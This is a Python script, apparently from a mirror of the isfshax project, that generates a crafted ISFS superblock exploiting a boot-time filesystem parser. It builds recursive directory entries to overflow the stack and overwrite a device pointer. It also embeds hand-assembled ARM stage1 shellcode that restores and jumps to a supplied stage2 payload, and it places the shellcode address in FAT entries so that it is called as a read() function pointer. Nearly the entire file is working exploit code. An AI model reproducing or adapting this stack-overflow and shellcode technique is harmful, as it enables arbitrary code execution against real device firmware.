mirror of
https://github.com/isfshax/isfshax.git
synced 2024-11-16 00:25:05 +01:00
148 lines
5.1 KiB
Python
148 lines
5.1 KiB
Python
#!/usr/bin/env python3
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import struct
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import sys
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from Crypto.Hash import SHA1
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stage2file = sys.argv[1]
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outfile = sys.argv[2]
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stage2 = bytearray(open(stage2file, "rb").read())
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# create superblock header
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header = struct.pack(">III",
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0x53465321, # magic
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0xfffffffe, # generation
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0x00000000 # field_0x8
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)
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# mark all blocks as bad
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fat = [0xFFFD] * 0x8000
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# generate FST entries
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def fstEntry(name, mode=2, attr=0, sub=0xFFFF, sib=0xFFFF, size=0, x1=0, uid=0, gid=0, x3=0):
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return struct.pack(">12sBBHHIHHHI", name.encode('ascii'), mode, attr, sub, sib, size, x1, uid, gid, x3)
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# create FST root node
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fst = fstEntry(name="/", sub=1)
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# create /sys/config/system.xml
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fst += fstEntry(name="sys", sub=2, sib=4)
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fst += fstEntry(name="config", sub=3)
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fst += fstEntry(name="system.xml", mode=0xC1, sub=0x7FFF, size=0x636)
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fat[0x7FFF] = 0xFFFB # prevent infinite loop in ISFS stat
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# ensure IOS detects this as a *very* broken
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# superblock rather than trying to repair it
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# by setting one file node sub to >0xFFFB
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fst += fstEntry(name="ios.stop", mode=0xC1, sib=5, sub=0xFFFC, size=1)
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# create 0x69 recursive entries to overflow the stack up
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# to 0x0D40E240 and overwrite FLA's FS device pointer
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# with the address of the superblock
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for i in range(5+0, 5+0x68):
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fst += fstEntry(name="a", sub=(i+1))
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fst += fstEntry(name="a")
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# clear stage2 fake FST entries mode field at k*0x20 + 0xC,
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# otherwise boot1 will clear the first bit of the size field
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repairData = bytearray()
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offs = 0x0C
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while offs < len(stage2):
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if (len(repairData) & 0x1F) == 0x0C:
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repairData.append(0) # skip FST mode field
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repairData.append(stage2[offs])
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stage2[offs] = 0
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offs += 0x20
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# place stage1/repairData/stage2 at the end of the FST
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superblockStart = 0x01f80000
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superblockEnd = superblockStart + 0x40000
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fstOffset = 0x1000c
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fstStart = superblockStart + fstOffset
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fstAreaSize = 6143 * 0x20
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stage2FstOffset = (fstAreaSize - len(stage2)) & ~0x1F
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stage2Addr = fstStart + stage2FstOffset
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repairDataFstOffset = (stage2FstOffset - len(repairData)) & ~0x1F
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repairDataAddr = fstStart + repairDataFstOffset
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# stage1 adds back the removed FST mode field bytes to stage2
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stage1Code = [
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b"\xe2\x8f\x00\x2c", # +00 add r0, pc, #0x2C @ get address of stage1 data
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b"\xe8\x90\x00\x07", # +04 ldmia r0, {r0, r1, r2} @ load repairDataAddr, repairDataEnd, stage2Addr
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b"\xe2\x82\x50\x0c", # +08 add r5, r2, 0xC @ compute address of first missing byte
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b"\x00\x00\x00\x00", # +0C @ skip FST mode field
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b"\xe2\x00\x40\x1f", # +10 loop: and r4, r0, #0x1F @ get last 5 bits of repair data ptr
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b"\xe4\xd0\x30\x01", # +14 ldrb r3, [r0], #1 @ load byte and increment repair data ptr
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b"\xe3\x54\x00\x18", # +18 cmp r4, #0x18 @ ignore repair data when ptr ends with 0x18 (-> fst+0xC)
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b"\x14\xc5\x30\x20", # +1C strbne r3, [r5], #0x20 @ otherwise write repair data to missing byte
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b"\xe1\x50\x00\x01", # +20 cmp r0, r1 @ check if repair data finished
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b"\x12\x4f\xf0\x1c", # +24 bne loop (subne pc, pc, #0x1C) @ otherwise loop
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b"\xe1\x2f\xff\x12", # +28 bx r2 @ jump to stage2
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b"\x00\x00\x00\x00", # +2C skip FST mode field
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b"\x00\x00\x00\x00", # +30
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]
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stage1 = b"".join(stage1Code)
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stage1 += struct.pack(">III", repairDataAddr, repairDataAddr + len(repairData), stage2Addr)
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stage1FstOffset = (repairDataFstOffset - len(stage1)) & ~0x1F
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stage1Addr = fstStart + stage1FstOffset
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# append stage1/repairData/stage2 to the FST
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if stage1FstOffset < len(fst):
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print("ERROR: insufficient superblock space for stage1")
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sys.exit(1)
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print('(offs %#05x) %#08x -> stage1' % (fstOffset + stage1FstOffset, stage1Addr))
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if repairDataFstOffset < len(fst):
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print("ERROR: insufficient superblock space for repair data")
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sys.exit(1)
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print('(offs %#05x) %#08x -> repair data' % (fstOffset + repairDataFstOffset, repairDataAddr))
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if stage2FstOffset < len(fst):
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print("ERROR: insufficient superblock space for stage2")
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sys.exit(1)
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print('(offs %#05x) %#08x -> stage2' % (fstOffset + stage2FstOffset, stage2Addr))
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fst += b"\x00" * (stage1FstOffset - len(fst))
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fst += stage1
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fst += b"\x00" * (repairDataFstOffset - len(fst))
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fst += repairData
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fst += b"\x00" * (stage2FstOffset - len(fst))
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fst += stage2
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fst += b"\x00" * (fstAreaSize - len(fst))
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# write stage1 entrypoint to the first two FAT entries; after
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# the stack overflow overwrites FLA's FS device pointer with
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# the address of the superblock, they will be interpreted as
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# as the structure's read() function pointer
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fat[0] = stage1Addr >> 16
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fat[1] = stage1Addr & 0xffff
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# create superblock
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superblock = header
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superblock += struct.pack(">32768H", *fat)
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superblock += fst
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superblock += b"\x00" * 0x14
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# write crafted superblock
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f = open(outfile, "wb")
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f.write(superblock)
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f.close()
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# write crafted superblock hash
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h = SHA1.new(superblock)
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f = open(outfile + ".sha", "wb")
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f.write(h.digest())
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f.close()
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print("isfshax: written superblock to " + outfile)
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